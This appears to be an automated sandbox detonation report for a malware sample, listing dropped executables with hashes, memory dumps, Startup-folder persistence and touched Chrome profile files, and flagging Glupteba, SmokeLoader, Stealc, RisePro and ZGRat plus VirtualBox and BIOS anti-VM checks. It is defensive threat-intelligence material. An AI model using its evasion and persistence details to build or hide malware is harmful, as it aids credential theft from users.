C:\Users\Admin\AppData\Local\Temp\7zS11A5.tmp\Install.exe
| MD5 | ce980b0374c62119c6af58d5daae97ff |
| SHA1 | 2cee78d2c86ab6b520570603a5a701432830f915 |
| SHA256 | 3efe5d54f1ee2a1fe0f5bab51711f12fcc69e9d7581546b646eb0191403aff78 |
| SHA512 | c8e8793c48731b27317560a4de9bcddc85503a3c3c5779899f3e78eecc5493d28cba173a41bd66cb30f881fea8f5890287be0d86499019d66983d099dea886d6 |
memory/760-713-0x0000000002D80000-0x0000000002D8B000-memory.dmp
memory/5392-728-0x0000000004DC0000-0x00000000051C4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-M5GLC.tmp\_isetup\_iscrypt.dll
| MD5 | a69559718ab506675e907fe49deb71e9 |
| SHA1 | bc8f404ffdb1960b50c12ff9413c893b56f2e36f |
| SHA256 | 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc |
| SHA512 | e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63 |
C:\Users\Admin\AppData\Local\Temp\is-M5GLC.tmp\_isetup\_isdecmp.dll
| MD5 | a813d18268affd4763dde940246dc7e5 |
| SHA1 | c7366e1fd925c17cc6068001bd38eaef5b42852f |
| SHA256 | e19781aabe466dd8779cb9c8fa41bbb73375447066bb34e876cf388a6ed63c64 |
| SHA512 | b310ed4cd2e94381c00a6a370fcb7cc867ebe425d705b69caaaaffdafbab91f72d357966916053e72e68ecf712f2af7585500c58bb53ec3e1d539179fcb45fb4 |
C:\Users\Admin\Documents\GuardFox\ZXVOsXkq1YByDDKKVRvePpsA.exe
| MD5 | 2ac4032a5e167efdd499c2c2912c6ee1 |
| SHA1 | 6c91dba3dcc3a6ec940751f5e330dfd0b5e62250 |
| SHA256 | 44a61750b0332b5bf2a225a32bd9415fce792ef7387af8d912896717d60f579c |
| SHA512 | 3280b482d5a93f473131c070dcf547664b24bdebb0a559c1b8683b097f93364b60e96c8c785337ed632abba1b1a35244ff4790613826355ebeb30f69614703ce |
C:\Users\Admin\Documents\GuardFox\WbpOVj2wdHtADLlWkCQJXyxg.exe
| MD5 | e928be0b37c50bea1f6785d5f107a5f9 |
| SHA1 | 97ee230e100903f38d2c555a23f8d41cc0a29c4e |
| SHA256 | 526fb7ef74f8b630e3c6f8b0c4bc099721ed0a7080122ecc9930dd9963af12ae |
| SHA512 | 314c72932388db618cb8c6074ef7d4e5f2f70ac1618ee239c497f89cd83b4458df30af3fb25c68c3fb1c7fc150bd71586b429a6f1e54f222767622915476cd73 |
C:\Users\Admin\Documents\GuardFox\ozHYoRTpmXEy7Cy7N9wHNH1A.exe
| MD5 | 6768723da6e47ec3e9ca3f7f8e394b32 |
| SHA1 | d4aae33c1079d38d5ce15eeca94b78c21c4f0827 |
| SHA256 | f54333041f6b31f2318906f0bfd731f2d9b54076f63c2c6fee4f3050d3f9cf08 |
| SHA512 | 49150c7e57466b3773a6db60d3ea6b83ae099c6051ea4c40df2cda7f8f0a1251f99522d3d7751e7ec7f3948096cef221e77313e5f73edbbcb4f5efe6d174c6d9 |
C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe
| MD5 | 468b5ca81289dfd23af652406a6f05e8 |
| SHA1 | e3d6538902f7feaf121c273aa90440bf03e0759f |
| SHA256 | 6875d8db22e46d800f109d736ff23045c278c6edff39073bdde6165d5c4f0725 |
| SHA512 | ac487ac47f4f2649abbb5eb57e81b18b27f0ae2410eb00f693e15192a87f4f5b536a3ffbf95a17df5373dc0cc73a6de047f190925d0aaa3d3ab16d77061e8961 |
C:\Users\Admin\Documents\GuardFox\ZXVOsXkq1YByDDKKVRvePpsA.exe
| MD5 | 85b8bc871173a6e4bad0c1ce4512fa94 |
| SHA1 | 1bc190521912ae0b7cfc63dc3f465c838519af0b |
| SHA256 | 2a3d0843d4221e783faa00472b271b8691aa69758901f8ff1cd27048f82abd7c |
| SHA512 | d5e408cddd6cfd2db72fce6684dffaf5db54bdf80f9bb55f07d1a891c243ecc05b97eeb670aefe3456dee3dfbc3a481799cc834a7b9502dd81bbff695372586d |
C:\Users\Admin\Documents\GuardFox\Ipjb8_Ct3Bu5_uNThO5sOupY.exe
| MD5 | 2a29805a55989c5c7aeaf3d7db33733b |
| SHA1 | 40b44ec0ec2bfef779206b778b3198246e8eec96 |
| SHA256 | 1116a2816cec6f91c6daaaaea4ee514aa2938173dbdaff31cd4b3a6d7ace61a2 |
| SHA512 | ae5744b53e83ba25dae326bcb4f49bbaa1c6fa637d67210e981d6b2cc37a08d87891559056b4c4a1325a510080c8e1b441f926d5c3cb06326fa3cc9cc4fdc8da |
C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe
| MD5 | 65daba653ca4373c6e373029de734912 |
| SHA1 | 068a651314134cc22d01a53a0915c1500ac39c9b |
| SHA256 | 197abd1b30f53d1b2cd40440c5e2c4c997859f6ba9541baaf00ec4af0117317b |
| SHA512 | 805122e9f71675c2aaeb0830b039a1f0b85e723cdf0e5779ec93111209573a50ad94d371421cc3e9c0bb7b308a7442debe62e28073f319f91cd8135bb05d449b |
C:\Users\Admin\Documents\GuardFox\FfTdssBgUOeUFS8ACw1xXwQq.exe
| MD5 | f4a1f7267bce561fb0f246398744e80c |
| SHA1 | c165332bbaa63503461cf132d1064e1cb4c40f10 |
| SHA256 | dab19fec033bf01808f56cee76efc9aecb5f3ec021967d5a2ba77ef221df685f |
| SHA512 | 516be57458e44ba392eed8c63715cce43e33fefb3591ac965d57ddf6c5ddb134cce853787a6156cd12cb064d4367be46c39fcbbfedcbe095fce48361987d2405 |
C:\Users\Admin\Documents\GuardFox\FfTdssBgUOeUFS8ACw1xXwQq.exe
| MD5 | b4a5f81ac543e37fa2e28d62ac764573 |
| SHA1 | 370baa62a301cb0530c26fb90ba351a616ed64b5 |
| SHA256 | 9ee005f2b817593c32b70e89eb41906604ffe2e9b37589ddf5fe7e98a4ca0c7e |
| SHA512 | fc5478633abd380df7b27baf76e5bbe66a1c76c07a06b3ea63a74a68263d29a4561caefe582a657f1165f3e3dd49fd30a44cf6f5ff9dcc47d75270282e393642 |
C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe
| MD5 | 58de93cf0c2b0a5635b2e3b3214c866f |
| SHA1 | 3e00de837b50e8af87a4aefb9c3d8ae25d4c559c |
| SHA256 | 536b1450a6447e3e3e816b536eeedb157b178389eb6b1a0311f550e6f9bc0300 |
| SHA512 | a9783544c61a948bea274b390ac522f3a59a3508531ef56fab9dcadf4fa6322b737eb572e871ca3289b6b9465a175e69ad6f49a7e041381e619e567923b2e4c8 |
C:\Users\Admin\Documents\GuardFox\Oo3P2P2VOFHTfbT2AUs5ehOf.exe
| MD5 | 185e06dfd32f7a3f186c2033c98e018a |
| SHA1 | f7407c91addb171c231a245d497c43bc3c014ab2 |
| SHA256 | f082eb28f5e2fe92bf5ca724d2a68795d4b9710729392c7518ed539a0ca52392 |
| SHA512 | 1a0d1272920488a16ee3fa8e8db52941daadb6b1f714a13bc4753d0add73f4ad8c747c0267104c284fcd078a1e1fd380a1dc6debb897b0e74fc7778580863c67 |
C:\Users\Admin\Documents\GuardFox\Oo3P2P2VOFHTfbT2AUs5ehOf.exe
| MD5 | ded95c15bfe89de3cf50fa3efa2df18d |
| SHA1 | ad489d1a76d19777d7291ffeceb2cc55e72573b2 |
| SHA256 | 5ba52e49da440e90572824edfecc2a5961dc5b7b7ac7d84eb1f4a431d770b19d |
| SHA512 | f18a3aa557eaf9c1699814cef895550ae4158595a3ea433fbd57a838cfad4dc458a4094d6fe5186d9fe83010674f0c303cdbf634cd8ce0b4a44a1e9a478a49a5 |
C:\Users\Admin\AppData\Local\Temp\is-J8KKB.tmp\HBZbjdUX0pRpCqEGONC_Y2ES.tmp
| MD5 | 2cdc1f1b74fdf3435106fc715a9a28f8 |
| SHA1 | aa65f3c6a6c9aee4183b9b17d0b3eb8c47c531b3 |
| SHA256 | f8baa0389f932a1c3999c756d6d860d13d1f343989963b5a620ba2f82c116e04 |
| SHA512 | 1e98aafc80ec47556175b634c2e1a6ee64b1cd59f631ea658619402fb111076c12e6ce49dd139f5ca93785c16411ec8e7581431edb819f8884dfc15aa5ff6640 |
memory/760-653-0x0000000002EB0000-0x0000000002FB0000-memory.dmp
C:\Users\Admin\Documents\GuardFox\griZbGlDTQ2Gp9lRWbcAmGPV.exe
| MD5 | 49239529c2109e90dd790de00ac31176 |
| SHA1 | fcacbbc7d0976b7247a98d9059c77803afaa3bf4 |
| SHA256 | 9da0fe0b0609ba1bb57ef33db191c17653960e989620210633f156ab74a59964 |
| SHA512 | 46f4555355c7d29b602e5090bcb1d4a4889e5821687dfffcee376e72b020f9148b5c4b9e28279a0d92dbf6ffbefea33ff26c5043b5176e2046bb3a00340d4d66 |
C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe
| MD5 | 5b609a5374df8fda73e9ca0c8fb1ffd5 |
| SHA1 | 126654173cf3e80ee85a531dfed60c7472c7d685 |
| SHA256 | 25dc8dc73c888125e62130ebe5ea1f6fc7c3ede62ccc5a3a90f5ee0a1b320e08 |
| SHA512 | fcec3906977a812d3e4b2033993d46847cc5b3459d538cf09c94c8cf4939574b5c3da7c500828edf0ff43a68a230545d5e43e55098604cbccab4b1c051892cc9 |
C:\Users\Admin\AppData\Local\Temp\onefile_2972_133531841536410118\WW9_64.exe
| MD5 | 20566b002f362a4bcda1e14730b2ed12 |
| SHA1 | 4d31cfdbcfcb6cf445e1ab45cee94d8f5cd24af4 |
| SHA256 | b1209290fe1d8a47401abb920032be4e31d216a6b3b6241041845de4020a294c |
| SHA512 | ca7b7390638029abddce6fd1cf8ec9083da8ded88428504ab97292d6876fecf28a3db90b1cf113258036b5e2e5ddff13607a370261e84e21557e579661056def |
memory/6076-821-0x0000000000A10000-0x000000000105A000-memory.dmp
memory/4896-825-0x0000000000400000-0x000000000075B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS1A40.tmp\Install.exe
| MD5 | f324b16d144a5b40f959a199bceee78e |
| SHA1 | 0267c345f3a28f41c20a6457662788297cdc2364 |
| SHA256 | 424b5f556bc77142d9aa57c6940ae3b68f78e06f402f26d372684d336370a698 |
| SHA512 | 90f63a6b840fe19e40d5dcad926fc06264c1ec8a8ffdb02d7a2e8be1fd0de8a2a2376ba486e286d183e848d572994b642cc3291f289e12f3086465f0d7445685 |
memory/1136-832-0x00007FFFB65A0000-0x00007FFFB6869000-memory.dmp
memory/1136-841-0x00007FFFB8A30000-0x00007FFFB8C25000-memory.dmp
C:\Users\Admin\AppData\Local\WBICreator\wbicreator.exe
| MD5 | 8ed26917251fa6a3aa2644976ec7debc |
| SHA1 | 7e7f800da94a91266a6ff9f131c8a14d9c7ddf96 |
| SHA256 | e241024675c66a176eaabfc6524b3c6d812cb90c6cc141de487ad09295c8df35 |
| SHA512 | 634b1823da06bbf7bf7fabc2643cb9e488cae37ae015ef4d2c30c38eb89f97d12edc5a822b6ae00864be2532c3567e60f675eaef895582c6ae1e23434880ba21 |
memory/5096-842-0x0000000005120000-0x00000000052CC000-memory.dmp
memory/1380-843-0x0000000010000000-0x00000000105E6000-memory.dmp
memory/760-831-0x0000000000400000-0x0000000002D3C000-memory.dmp
memory/6076-840-0x0000000005A50000-0x0000000005DA4000-memory.dmp
memory/4316-845-0x00000000000B0000-0x0000000000D42000-memory.dmp
memory/6088-849-0x0000000000A10000-0x0000000001793000-memory.dmp
memory/5980-853-0x0000000001BF0000-0x0000000001BF1000-memory.dmp
memory/6076-852-0x0000000007080000-0x000000000735C000-memory.dmp
memory/5096-854-0x00000000052D0000-0x0000000005874000-memory.dmp
memory/5980-850-0x0000000001AB0000-0x0000000001AB1000-memory.dmp
memory/5980-847-0x0000000001960000-0x0000000001961000-memory.dmp
memory/1136-836-0x00007FFFB7480000-0x00007FFFB753E000-memory.dmp
C:\Users\Admin\Documents\GuardFox\griZbGlDTQ2Gp9lRWbcAmGPV.exe
| MD5 | 5fb735a2f511c943beb42ebee1921ec1 |
| SHA1 | 05dd1de613b28dd77c1fb48f327a51a9722588ac |
| SHA256 | d93e3720afa228dfd4cfaecf6fe472f85cd5e159b2a1e847300dd436804afc30 |
| SHA512 | 4f2f5c6dd13803f0e267591549bb4de560370f70be20bccc6921e95731e62a67095def644336641b546994ae8c19f0f13d93d242d7e21053f0c688e70d3252c0 |
memory/4748-834-0x0000000002F20000-0x0000000003020000-memory.dmp
memory/4748-837-0x0000000002EB0000-0x0000000002EE4000-memory.dmp
memory/6076-828-0x00000000059B0000-0x0000000005A4C000-memory.dmp
memory/1136-824-0x0000000140000000-0x0000000140B9C000-memory.dmp
memory/3492-822-0x0000000000DD0000-0x0000000000DE6000-memory.dmp
memory/760-820-0x0000000000400000-0x0000000002D3C000-memory.dmp
C:\Users\Admin\AppData\Local\WBICreator\wbicreator.exe
| MD5 | 28734fda0ba6ef7d50b37a4ca83f3aab |
| SHA1 | e8062d6db3598d1524b06c0a651969ed95071aab |
| SHA256 | 1bc45dfb9a36d4a74616e868503e1ff7fd666026fee21c4e2b72d485df9e8b26 |
| SHA512 | 55b65c7f71c964d8f32b4092a87dd642b8705c4069705d1833689c037553e9b80f4d321d9f3f9af13f4dcf1f1a628ce16e418f121a2698f8de8432b40b9c503c |
memory/2816-817-0x0000000002200000-0x000000000231B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\onefile_2972_133531841536410118\WW9_64.exe
| MD5 | 51b8986dff69e4e76998a31c64b21fad |
| SHA1 | a677f18ed3e1c4aac01116357606b5bdbee3ac45 |
| SHA256 | c1e1914eb3c9e80751b8b176316320a720273b73f4714bd4f71faf730a800c0b |
| SHA512 | 66efcb0f5e201cd9154ed8695e48ec0cb00623ae6a5a2d4b8c37fed33bd5de71c14aa2df4de71b11897a0f35c350b626f309d50aa43317f3062b461c1ff2779c |
C:\Users\Admin\AppData\Local\Temp\onefile_2972_133531841536410118\vcruntime140.dll
| MD5 | 870fea4e961e2fbd00110d3783e529be |
| SHA1 | a948e65c6f73d7da4ffde4e8533c098a00cc7311 |
| SHA256 | 76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644 |
| SHA512 | 0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88 |
memory/4896-811-0x0000000000400000-0x000000000075B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\onefile_2972_133531841536410118\python311.dll
| MD5 | b900ee8eda806364320b6ee7ec61f162 |
| SHA1 | b572fc3a3aece241b6d3cff09fac7a1d4838a287 |
| SHA256 | 4424e607c6670732c830155f3b93c906d1c3dd175e51fa163551c726526378a7 |
| SHA512 | 9029a2f1579c9d326ee16a645a494d58c3b2908efbbd60e60aa094c8adc71e6f76fc0062d3b57c9af521cb159ff66a8be72494efe467ebd5aaf99ae72ad5a01d |
memory/844-809-0x0000000000400000-0x0000000000537000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\onefile_2972_133531841536410118\python311.dll
| MD5 | ebbfeeb784a5157f90fe24bffebfc17e |
| SHA1 | d7c8b5a4c15a72b71fd90ee59741e3199279f687 |
| SHA256 | cbc2090b1b3f861a781db61f4af02eb7c91b5fe3badea38b04c6b73ca3e60b23 |
| SHA512 | 2fd80a30657c75b682ccd49012fac2f427ba1509fff897c01c5283786813455371154673ec52e944ea0e288f118012cdcd3454e58379335f98dc74e8dfd224f9 |
memory/2816-807-0x0000000000621000-0x00000000006B3000-memory.dmp
memory/844-805-0x0000000000400000-0x0000000000537000-memory.dmp
memory/844-802-0x0000000000400000-0x0000000000537000-memory.dmp
C:\Users\Admin\AppData\Local\WBICreator\wbicreator.exe
| MD5 | 59dd644ef3554b20453fc011561f9ffa |
| SHA1 | a7e0f68794e65e9a6b7ec2aa0f020b5aaa1dd6e3 |
| SHA256 | 5260044a2a292cf54922bf361f341da5511f0a70f2821a18ff83edfe9d1541e2 |
| SHA512 | 045aad59eb207bbf54b63e01a1cbc1b661a2d57b7d6b69d394e2556c98c28df67d790a4cf05f1c16dac2bee88c22e6577aeaeb3cfa831fadaac8e3e4ef0d04e7 |
memory/5980-860-0x0000000001C00000-0x0000000001C01000-memory.dmp
memory/5096-867-0x0000000004F70000-0x000000000511A000-memory.dmp
memory/5980-872-0x0000000001C30000-0x0000000001C31000-memory.dmp
memory/5980-876-0x0000000000ED0000-0x000000000191B000-memory.dmp
memory/5980-866-0x0000000001C20000-0x0000000001C21000-memory.dmp
memory/5980-864-0x0000000001C10000-0x0000000001C11000-memory.dmp
memory/1856-863-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
| MD5 | 8202a1cd02e7d69597995cabbe881a12 |
| SHA1 | 8858d9d934b7aa9330ee73de6c476acf19929ff6 |
| SHA256 | 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5 |
| SHA512 | 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
| MD5 | f656f216df8183e49e9aca6699613b90 |
| SHA1 | 47f02aa20960384c421c2fb5b2c8bc70859424ea |
| SHA256 | 17cfe329e9a5e2406385479b2cfafb11082f039797a3483c6d7ae00429b69efc |
| SHA512 | 6c97dcc93a2f592193f39f54946e441e205e07fc527de2f396f288e5c920a7171c909d72c78d97ecb6c3c4fe2ad05620efcdd4225a77122840a7e2a1a131a666 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | e9bbe2a17f17f189b57d897e82ca168c |
| SHA1 | 75638f84e3db80f805352cb902268db3e5f8d0e6 |
| SHA256 | 12b54437e0a095fcccf08f11c31dce1faebed94a66742025966ca350bfbf8dc0 |
| SHA512 | 863874727232e942fb6d45ea7ce1694efa2a414327e8a823f932f8fc72db149bf5d9cfc3e7e400ce621ee24ca422170080e37fa7adde3830c4c50b0d146e0911 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | efd179f6a8d0e8b37827201be10ea90d |
| SHA1 | 7947ce4ddc66740d251fc40ad41a9fda2cae5180 |
| SHA256 | a75002ba5bb8cfe3d27aa802a8b279a6043ebc67cf142c997e3f3eedada29133 |
| SHA512 | 4549b7506e21f1ff7f0242261f7d1ff5d2bc1abc40a1a1d7f2693f3082d2c7d5e1e206a275e8ea6b9cfcab151b2ea722939fd0ac1fa7edbb8ce3bf817ce814f8 |
memory/4748-855-0x0000000000400000-0x0000000002D3F000-memory.dmp
memory/3608-878-0x0000000000400000-0x000000000066F000-memory.dmp
memory/2460-865-0x0000000000400000-0x000000000311F000-memory.dmp
memory/3608-884-0x0000000000400000-0x000000000066F000-memory.dmp
memory/4316-880-0x00000000000B0000-0x0000000000D42000-memory.dmp
memory/2568-881-0x0000000000780000-0x0000000000D37000-memory.dmp
memory/5972-893-0x00000000007A0000-0x0000000000DB2000-memory.dmp
memory/4748-886-0x0000000000400000-0x0000000002D3F000-memory.dmp
memory/5096-895-0x00000000728A0000-0x0000000073050000-memory.dmp
memory/6088-901-0x00000000005E0000-0x00000000005E1000-memory.dmp
memory/2868-910-0x0000000002FDE000-0x0000000002FF3000-memory.dmp
memory/2868-912-0x0000000002E90000-0x0000000002E9B000-memory.dmp
memory/5972-902-0x00000000007A0000-0x0000000000DB2000-memory.dmp
memory/3608-894-0x0000000000400000-0x000000000066F000-memory.dmp
memory/5972-896-0x00000000007A0000-0x0000000000DB2000-memory.dmp
memory/2868-922-0x0000000000400000-0x0000000002D3C000-memory.dmp
C:\Windows\System32\GroupPolicy\GPT.INI
| MD5 | 7cc972a3480ca0a4792dc3379a763572 |
| SHA1 | f72eb4124d24f06678052706c542340422307317 |
| SHA256 | 02ad5d151250848f2cc4b650a351505aa58ac13c50da207cc06295c123ddf5e5 |
| SHA512 | ff5f320356e59eaf8f2b7c5a2668541252221be2d9701006fcc64ce802e66eeaf6ecf316d925258eb12ee5b8b7df4f8da075e9524badc0024b55fae639d075b7 |
C:\Windows\System32\GroupPolicy\Machine\Registry.pol
| MD5 | cdfd60e717a44c2349b553e011958b85 |
| SHA1 | 431136102a6fb52a00e416964d4c27089155f73b |
| SHA256 | 0ee08da4da3e4133e1809099fc646468e7156644c9a772f704b80e338015211f |
| SHA512 | dfea0d0b3779059e64088ea9a13cd6b076d76c64db99fa82e6612386cae5cda94a790318207470045ef51f0a410b400726ba28cb6ecb6972f081c532e558d6a8 |
memory/5972-968-0x0000000001320000-0x0000000001321000-memory.dmp
memory/5948-978-0x0000000004AE0000-0x0000000004B16000-memory.dmp
memory/5948-981-0x0000000005150000-0x0000000005778000-memory.dmp
memory/3608-989-0x0000000000400000-0x000000000066F000-memory.dmp
memory/5972-988-0x00000000007A0000-0x0000000000DB2000-memory.dmp
C:\Users\Admin\Documents\GuardFox\WbpOVj2wdHtADLlWkCQJXyxg.exe
| MD5 | c62111e224ffd51eb32967e3168fa39a |
| SHA1 | 284474830f72dab6c29ce67cfcc4db513e10560b |
| SHA256 | 3483695dadfe58b7f2df246272d9f532f28e3588d77fc61c0fa686ff2b8d3531 |
| SHA512 | 38bdd09f87cf22837fac0b34209792e5509177b51ed123b01f8f6870b812c958343c01b39a79d980aa936c3c818834a30a6025c28adc2146b7f9182f8944df6b |
memory/5948-991-0x0000000005820000-0x0000000005842000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_43hc2bq5.k3b.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5948-998-0x00000000059C0000-0x0000000005A26000-memory.dmp
memory/5948-1004-0x0000000005B30000-0x0000000005B96000-memory.dmp
memory/2460-1008-0x0000000004DC0000-0x00000000051C3000-memory.dmp
memory/5948-1012-0x00000000060A0000-0x00000000060BE000-memory.dmp
memory/5948-1017-0x0000000006640000-0x000000000668C000-memory.dmp
C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe
| MD5 | 84e5ccdfbdfd9d92456c890e6d8641d4 |
| SHA1 | bc1f99c3a86a6a3258e6baa57c26be3a4403146e |
| SHA256 | d4b9f4354252a9c203a211d8d600113f9d236ecca6234f43b5aa02350b5b24cc |
| SHA512 | 5f57e132b811e83f167f4b624397262b83982c9781dd05cba20bd2de798fcf1fd010c268060fcdf5601d5c2af1d4a61c2ff8a3ed659a25ceb6a3ef1034b8cf4c |
memory/844-1027-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2460-1030-0x00000000051D0000-0x0000000005ABB000-memory.dmp
memory/5684-1032-0x00000000020C0000-0x00000000020C1000-memory.dmp
memory/2568-1033-0x0000000004B00000-0x0000000004B01000-memory.dmp
memory/2568-1035-0x0000000004AF0000-0x0000000004AF1000-memory.dmp
memory/2568-1034-0x0000000004B70000-0x0000000004B71000-memory.dmp
memory/2568-1037-0x0000000004AE0000-0x0000000004AE1000-memory.dmp
memory/2568-1038-0x0000000004B40000-0x0000000004B41000-memory.dmp
memory/2568-1039-0x0000000004B90000-0x0000000004B91000-memory.dmp
memory/2568-1040-0x0000000004B20000-0x0000000004B21000-memory.dmp
memory/2568-1041-0x0000000004B50000-0x0000000004B51000-memory.dmp
memory/2568-1042-0x0000000004B80000-0x0000000004B81000-memory.dmp
memory/2568-1043-0x0000000004AD0000-0x0000000004AD1000-memory.dmp
memory/2568-1036-0x0000000000780000-0x0000000000D37000-memory.dmp
memory/5392-1031-0x0000000000400000-0x000000000311F000-memory.dmp
C:\ProgramData\mozglue.dll
| MD5 | fef383de063d9a06313fef7706559216 |
| SHA1 | ae4bc1e98fd31ef81be55445e68fadb1e12b9d2e |
| SHA256 | a07223dcca324c67db2503a62e049839577f5bdacf3ded6bd2454aafbb7fe649 |
| SHA512 | f3c3816940245957764a17f708cef9822188669407dfee4faf967fa6831391d2c3a5041054b6238c986c802b391c45089502598d46d558988c16f4c0f271107f |
C:\ProgramData\Are.docx
| MD5 | a33e5b189842c5867f46566bdbf7a095 |
| SHA1 | e1c06359f6a76da90d19e8fd95e79c832edb3196 |
| SHA256 | 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454 |
| SHA512 | f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | d3303bae634c7937c8eee59ea661dcad |
| SHA1 | bff96bcfc6fb4139b39e2075c09f5d983fd050ba |
| SHA256 | 248642cd9eb6166159c7e8286aab2578ad438d874594c08080358a9b596cda47 |
| SHA512 | 9b2710e09994248bb8a66dbf1dd308796c2054997a28d54bf15d3e17e5a8bbb915fa9aec6e0fdd6c676045e573e1238b4b59d17450a3984c95b07d5817aa4e33 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | c8bb0c9748e5e42643c71507bb3e5b96 |
| SHA1 | 8eaa842c7787b73948bd3d6854f5efbd66fe7ebb |
| SHA256 | 0673bce96a64d18933b66e03d7618a0acad90f8351f57a2a671f2b7dd150ab21 |
| SHA512 | 0e98345388fb0c8ed469188d175e8128d40c89f6673303958db99f5710851f448e6aa3c541a04ce113a718bf879932eb22f407f09326af580ab47abfa263ac6a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\2ce63f7b-a340-4812-bb97-ddbf69b20b87.tmp
| MD5 | 50302e65cb47e38c6996a173d92d04e3 |
| SHA1 | a8962ca20660a13d9965d5146237853619aa986f |
| SHA256 | 390e3ba7f27c9a8d92dbc8c716f799b785329d596a4718b8fc8bd7c7a5ac1ada |
| SHA512 | 92ee7f2b445113e00e2ba5d5aa2cb5125d56daeb2059b213b635dd9052d4d4fd45f65a1e4cb80e5dcf415790f4b583cab8bb2b9ffa9d00a8ef31bb1d17cea78d |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe
| MD5 | a5ce3aba68bdb438e98b1d0c70a3d95c |
| SHA1 | 013f5aa9057bf0b3c0c24824de9d075434501354 |
| SHA256 | 9b860be98a046ea97a7f67b006e0b1bc9ab7731dd2a0f3a9fd3d710f6c43278a |
| SHA512 | 7446f1256873b51a59b9d2d3498cef5a41dbce55864c2a5fb8cb7d25f7d6e6d8ea249d551a45b75d99b1ad0d6fb4b5e4544e5ca77bcd627717d6598b5f566a79 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-02-23 17:45
Reported
2024-02-23 17:49
Platform
win7-20240221-en
Max time kernel
51s
Max time network
213s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RisePro
SmokeLoader
Stealc
ZGRat
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\7zO86AF41E6\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\7zO86A9AAC6\setup.exe | N/A |
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zO86AF41E6\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zO86AF41E6\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zO86A9AAC6\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zO86A9AAC6\setup.exe | N/A |
